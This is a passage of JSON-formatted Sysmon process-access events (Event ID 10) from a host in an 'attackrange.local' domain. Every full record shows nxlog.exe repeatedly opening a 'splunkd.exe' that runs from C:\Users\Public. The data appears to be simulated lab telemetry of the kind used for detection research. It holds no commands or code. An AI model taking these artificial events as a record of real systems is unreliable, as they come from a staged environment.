(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:42.540","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6323,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:43.540\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:43.540","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6324,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:44.540\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:44.540","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6325,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:45.540\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:45.540","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6326,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:46.540\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:46.540","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6327,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:47.541\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:47.541","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6328,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:48.541\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:48.541","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
